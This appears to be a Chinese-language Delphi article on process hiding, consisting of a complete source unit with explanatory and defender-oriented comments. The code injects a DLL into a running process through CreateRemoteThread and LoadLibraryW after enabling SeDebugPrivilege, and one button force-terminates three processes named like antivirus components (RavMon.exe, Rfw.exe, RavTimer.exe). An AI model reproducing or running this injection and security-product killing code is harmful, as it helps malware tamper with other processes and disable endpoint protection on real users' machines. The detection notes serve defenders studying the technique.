
[Delphi文章] 如何在Windows平台下实现进程隐藏 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全


unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  StdCtrls, tlhelp32;
{type
  TProcessEntry32 = record
    dwSize: DWORD;
    cntUsage: DWORD;
    th32ProcessID: DWORD;
    th32DefaultHeapID: DWORD;
    th32ModuleID: DWORD;
    cntThreads: DWORD;
    th32ParentProcessID: DWORD;
    pcPriClassBase: integer;
    dwFlags: DWORD;
    szExeFile: array[0..MAX_PATH - 1] of char;
  end; }
type
  { Main form of the sample.  Button1 runs the DLL injection
    (AttachToProcess) and Button2 terminates a fixed list of processes
    (TForm1.TerminateAProcess).  Nothing in this unit hides a process;
    whatever the article's title refers to would presumably live in the
    injected Project2.dll, which is not part of this file. }
  TForm1 = class(TForm)
    Button1: TButton;
    Button2: TButton;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Looks a process up by base file name and calls TerminateProcess on it;
      HostFile is declared var but is never modified. }
    function TerminateAProcess(var HostFile: string):Boolean;
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;  // global instance of the form declared above

implementation

{$R *.DFM}

{ Walks a Toolhelp process snapshot and returns in ProcessID the id of the
  first entry whose executable matches AFilename; ProcessID is 0 when no
  entry matches.
  PathMatch = True  : lppe.szExeFile is compared as a whole, case-insensitively,
                      against AFilename (whether that field carries a full
                      path is not established by this unit).
  PathMatch = False : only the file names (ExtractFilename of both sides) are
                      compared, so any process with that base name matches
                      regardless of the directory it runs from.
  Notes: the snapshot handle is used without being checked, and lppe.dwSize
  is never initialised before Process32First. }
procedure FindAProcess(const AFilename: string; const PathMatch: Boolean; var ProcessID: DWORD);
var
  lppe: TProcessEntry32;
  SsHandle: Thandle;
  FoundAProc, FoundOK: boolean;
begin
  ProcessID :=0;
  SsHandle := CreateToolHelp32SnapShot(TH32CS_SnapProcess, 0);
  FoundAProc := Process32First(Sshandle, lppe);
  while FoundAProc do
  begin
    if PathMatch then
      FoundOK := AnsiStricomp(lppe.szExefile, PChar(AFilename)) = 0
    else
      FoundOK := AnsiStricomp(PChar(ExtractFilename(lppe.szExefile)), PChar(ExtractFilename(AFilename))) = 0;
    if FoundOK then
    begin
      ProcessID := lppe.th32ProcessID;
      break;  // first match wins
    end;
    FoundAProc := Process32Next(SsHandle, lppe);
  end;
  CloseHandle(SsHandle);
end;

{ Enables (bEnabled = True) or disables SeDebugPrivilege in the current
  process token.  Returns False when the token cannot be opened; otherwise
  returns True exactly when GetLastError is ERROR_SUCCESS after
  AdjustTokenPrivileges.  When the privilege is not present in the token,
  AdjustTokenPrivileges reports ERROR_NOT_ALL_ASSIGNED, so Result is False.
  The return values of LookupPrivilegeValue and AdjustTokenPrivileges
  themselves are not checked.
  Defender note: a process toggling SeDebugPrivilege immediately before
  OpenProcess on another process is the usual prelude to cross-process
  tampering; Windows Security event 4703 ("A user right was adjusted")
  records this privilege change. }
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;  // clear the enabled bit
    a := 0;  // ReturnLength output; its value is not used
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

{ Loads GuestFile into another process via the CreateRemoteThread /
  LoadLibraryW technique.
  HostFile  : base name of the target process, used only when PID = 0
              (looked up with FindAProcess, PathMatch = False).
  GuestFile : path of the DLL the target process is made to load.
  PID       : explicit target process id; 0 means resolve HostFile by name.
  Returns the thread handle from CreateRemoteThread, or 0 when the path
  could not be written into the target.
  Detection note: the call chain OpenProcess(CREATE_THREAD + VM_OPERATION +
  VM_WRITE) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
  with a start address inside kernel32 (LoadLibraryW) is the textbook
  injection pattern that EDR hooks and Sysmon Event ID 8 (CreateRemoteThread)
  are built to surface; the injected DLL also shows up in the target's
  loaded-module list.
  Handle hygiene: hRemoteProcess and the returned thread handle are never
  closed here, and the OpenProcess / VirtualAllocEx results are used without
  being validated. }
function AttachToProcess(const HostFile, GuestFile: string; const PID: DWORD = 0): DWORD;
var
  hRemoteProcess: THandle;
  dwRemoteProcessId: DWORD;
  cb: DWORD;
  pszLibFileRemote: Pointer;
  iReturnCode: Boolean;
  TempVar: DWORD;
  pfnStartAddr: TFNThreadStartRoutine;
  pszLibAFilename: PwideChar;
begin
  Result := 0;
  EnabledDebugPrivilege(True);  // so OpenProcess succeeds on processes the caller otherwise lacks rights to
  Getmem(pszLibAFilename, Length(GuestFile) * 2 + 1);  // local UTF-16 copy of the DLL path, sized in bytes
  StringToWideChar(GuestFile, pszLibAFilename, Length(GuestFile) * 2 + 1);
  if PID > 0 then
     dwRemoteProcessID := PID
  else
     FindAProcess(HostFile, False, dwRemoteProcessID);  // base-name match; dwRemoteProcessID = 0 if not found
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {allow creating a thread in the remote process}
      PROCESS_VM_OPERATION + {allow remote VM operations}
      PROCESS_VM_WRITE, {allow remote VM writes}
      FALSE, dwRemoteProcessId);
  cb := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR);  // byte length of the wide path including terminator
  pszLibFileRemote := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, cb, MEM_COMMIT, PAGE_READWRITE));  // buffer for the path inside the target
  TempVar := 0;
  iReturnCode := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename, cb, TempVar);
  if iReturnCode then
  begin
    // LoadLibraryW is resolved in this process; using that address remotely
    // assumes kernel32 is mapped at the same base in the target.
    pfnStartAddr := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');
    TempVar := 0;
    // the remote thread runs LoadLibraryW(<remote copy of GuestFile>)
    Result := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote, 0, TempVar);
  end;
  Freemem(pszLibAFilename);
end;

{ Injects Project2.dll, expected in the same directory as this executable,
  into the first process whose base name is Rfw.exe.  The returned thread
  handle is discarded. }
procedure TForm1.Button1Click(Sender: TObject);
begin
  AttachToProcess('Rfw.exe', extractfilepath(paramstr(0))+'Project2.dll');
end;

{ Finds the process whose base name equals HostFile and calls
  TerminateProcess on it.  SeDebugPrivilege is enabled for the duration and
  disabled again before returning.
  Result is always True: a failed TerminateProcess only shows GetLastError
  in a message box and does not change Result, and a missing process is
  silently ignored.  The process handle is opened with PROCESS_TERMINATE and
  bInheritHandle = True and is never closed.  HostFile is never modified
  despite the var parameter. }
function TForm1.TerminateAProcess(var HostFile: string): Boolean;
var
  HProcessedID:DWORD;
  HProcedss:THandle;
begin
  Result:=True;
  EnabledDebugPrivilege(True);
  FindAProcess(HostFile,False,HProcessedID);  // HProcessedID = 0 when no such process
  if HProcessedID<>0 then
  begin
    HProcedss:=OpenProcess(PROCESS_TERMINATE,True,HProcessedID);
    if not TerminateProcess(HProcedss,0) then
       ShowMessage(IntToStr( GetLastError));  // report the Win32 error code only
  end;
  EnabledDebugPrivilege(False);
end;

{ Terminates RavMon.exe, Rfw.exe and RavTimer.exe, in that order.  These
  names appear to belong to an antivirus suite, so this button is the
  "stop the security product first" step rather than anything that hides a
  process.  FileName is declared with 26 slots but only three are used;
  the Boolean results of TerminateAProcess are discarded. }
procedure TForm1.Button2Click(Sender: TObject);
var
  FileName:array[0..25] of String;
begin
  FileName[0]:='Rfw.exe';
  FileName[1]:='RavMon.exe';
  FileName[2]:='RavTimer.exe';
  TerminateAProcess(FileName[1]);
  TerminateAProcess(FileName[0]);
  TerminateAProcess(FileName[2]);
end;

end.

